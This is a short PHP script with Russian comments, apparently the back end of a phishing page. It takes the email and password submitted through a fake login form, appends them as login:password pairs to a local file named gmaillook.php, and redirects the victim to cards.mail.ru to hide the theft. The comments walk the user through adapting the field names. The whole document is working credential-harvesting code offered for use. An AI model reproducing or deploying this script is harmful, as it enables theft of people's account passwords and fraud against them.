<?php
    $Login = $_POST['Email']; // Это мы берем наши login
    $Passw = $_POST['Passwd']; // и passwd. Если у вас не так называются поля, то исправьте

    $fp = fopen("gmaillook.php","a+"); // Открываем файл базы
    fwrite($fp,"$Login:$Passw\n"); // Записываем логин:пароль
    fclose($fp); // Закрываем файл

    header("Location: http://cards.mail.ru/"); // Сюда потом отправится юзер
    echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=\"http://cards.mail.ru/\">"; // тут тоже самое
?>